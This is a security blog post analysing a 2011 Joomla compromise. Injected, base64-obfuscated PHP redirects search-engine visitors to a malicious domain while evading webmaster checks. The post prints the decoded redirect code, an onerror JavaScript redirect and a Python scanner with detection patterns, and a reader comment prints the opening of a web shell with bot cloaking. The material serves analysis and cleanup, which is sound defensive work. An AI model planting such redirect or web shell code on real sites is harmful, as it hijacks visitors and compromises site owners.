Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

Ciscotred .cz .cc – Joomla Hack

   08 Aug 11   Filed in Short Attack Reviews

During the last few days I’ve noticed an increased number of websites that redirect search traffic to ciscotred .cz .cc. The typical Unmask Parasites report looks like this:

[Screenshot of the Unmask Parasites report: "ciscotred .cz.cc redirect detected"]

The attack mostly affects websites that use a very old version of Joomla (usually 1.5), so I suspect that hackers use some Joomla vulnerability (still need to see access logs of the hacked sites to be able to tell where exactly the security hole is).

The malicious PHP code is injected into configuration files:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQo..skipped...Ck7DQoJfQ0KfQ0KfQ=="));

decoded:

error_reporting(0);                      // hide PHP errors so the injection stays quiet
$nccv=headers_sent();
if (!$nccv){                             // only act while a Location header can still be sent
    $referer=$_SERVER['HTTP_REFERER'];
    $ua=$_SERVER['HTTP_USER_AGENT'];     // read but never used in this version
    // visitor arrived from a major search engine?
    if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
        // skip "cache" / "inurl" referers, which are typical of webmasters and researchers checking a site
        if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
            header("Location: hxxp://ciscotred .cz .cc/");
            exit();
        }
    }
}

The code looks like a revised version of the code that redirected search traffic to various .pl (e.g. fgnfdfthrv.bee .pl, gberbhjerfds.osa .pl, newwave.orge .pl, antispyche.bij .pl, gberbhjerfds.osa .pl) during the last couple of years.

The code itself checks whether a visitor comes from a major search engine and, if so, redirects to ciscotred .cz .cc. To prevent the redirect from being detected by webmasters and security researchers, it also checks whether the visitor used the inurl search operator or opened a cached version of the web page.

At this time I only see hacked Joomla sites, but the redirect code is quite universal and can be injected into any PHP website.

Update (August 9, 2011): I was right to compare this attack with the former .pl attack. Today the malicious code changed and now redirects to hxxp://www.liaekim .com .br/site/includes/js/wz_uye.html, which includes the following code:

<img src="tick1.jpg" onerror="location.href='hxxp://trwqfhxf .bee .pl/?q=videos'">

To webmasters

Joomla 1.5 is too old and not safe to use. Please upgrade to the latest version of Joomla (currently 1.7 — by the way, it has a one-click upgrade feature now!)

Password protect the admin directory of Joomla (I mean the directory, not the Joomla itself, which is already password-protected). Consider changing all site passwords.

Regularly check integrity of files on server. Scan them for suspicious code like “eval(base64_decode” — this is the most commonly used string in obfuscated malicious PHP code.
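A minimal integrity check along these lines, written for this post as an added example and not the author's own tool: it finds eval(base64_decode(...)) calls in PHP files, decodes the blob, and flags the traits of the redirect payload shown above (referer check, search-engine filter, Location header, silenced errors). The sample configuration file and the example.invalid hostname are constructed for the demonstration.

```python
import base64
import re
from pathlib import Path

# eval(base64_decode("...")) with either quote style; group 1 is the blob.
EVAL_B64 = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)')

# Traits of the decoded redirect payload from the post; names are sorted in the report.
INDICATORS = {
    "referer_check": re.compile(r"HTTP_REFERER", re.I),
    "search_engine_filter": re.compile(
        r"stristr\s*\(\s*\$\w+\s*,\s*['\"](google|yahoo|bing|msn|ask\.com|live)['\"]", re.I),
    "redirect": re.compile(r"header\s*\(\s*['\"]Location:", re.I),
    "errors_silenced": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
}

def decode_blob(blob: str) -> str:
    """Decode a base64 blob (whitespace tolerated); returns '' if it is not valid base64."""
    try:
        return base64.b64decode(re.sub(r"\s+", "", blob), validate=True).decode("latin-1")
    except ValueError:
        return ""

def scan_source(src: str) -> list:
    """One finding per eval(base64_decode(...)) call: offset, decoded size, matched indicators."""
    findings = []
    for m in EVAL_B64.finditer(src):
        decoded = decode_blob(m.group(1))
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
        findings.append({"offset": m.start(), "decoded_len": len(decoded), "indicators": hits})
    return findings

def scan_tree(root: str, exts=(".php",)) -> dict:
    """Walk a site root and scan every PHP file; returns {path: findings} for files with hits."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            hits = scan_source(path.read_text(encoding="latin-1", errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

# Constructed sample: a trimmed copy of the decoded payload, wrapped the way the injector does.
SAMPLE_PAYLOAD = ('error_reporting(0);\nif (!headers_sent()){\n$referer=$_SERVER[\'HTTP_REFERER\'];\n'
                  'if (stristr($referer,"google") or stristr($referer,"bing")) {\n'
                  'header("Location: http://example.invalid/");\nexit();\n}}\n')
SAMPLE_CONFIG = ('<?php\n$mosConfig_host = "localhost";\neval(base64_decode("'
                 + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode() + '"));\n')

if __name__ == "__main__":
    for f in scan_source(SAMPLE_CONFIG):
        print(f"offset {f['offset']}: {', '.join(f['indicators']) or 'no known indicators'}")
```

Run scan_tree("/path/to/joomla") against a known-good copy as well as the live site; a blob that decodes to a plain string constant is a false positive worth whitelisting, while any hit with the redirect and referer_check indicators together is the pattern described in this post.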

Let me know if you have any information about the security hole used in this attack.

Reader's Comments (5)

  1.

    I have been infected; after searching I found an img.ph in the images directory of my Joomla site.

    It has obfuscated code which starts:
    (still I do not know how it was put there, but this has code for searching many parts of the server that may have been compromised)

    $auth_pass = "7b24afc8bc80e548d66c4e7ff72171c5";
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_charset = 'Windows-1251';

    if( !empty($_SERVER['HTTP_USER_AGENT']) ) {
        $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
        foreach($userAgents as $agent)
            if( strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false ) {
                header('HTTP/1.0 404 Not Found');
                exit;
            }
    }
    @session_start();
    @error_reporting(0);
    @ini_set('error_log',NULL);
    @ini_set('log_errors',0);
    @ini_set('max_execution_time',0);
    @set_time_limit(0);
    @set_magic_quotes_runtime(0);
    @define('VERSION', '2.3');

  2.

    Thank you for your website and information. I found the following similar code on my website:

    I also sincerely appreciate Javier’s reply to this post as it directed me to the same file on my server to eliminate it.

    Thanks for the help.

    Ben

  3.

    I’m getting the same problem. But I clean the code and then in 2 days it is the same story. I can’t find how they can do that, because I have several different websites: one is on J 1.5 (latest version), another on J 2.5 (latest version) and another one on J 1.7 (latest version).

    IN ONE NIGHT THEY HACKED ALL MY SITES, IT IS INCREDIBLE.

    I need help to solve this, and I don’t understand what img.ph is.

    Can you help me to fix this please?

    PS: Sorry for my English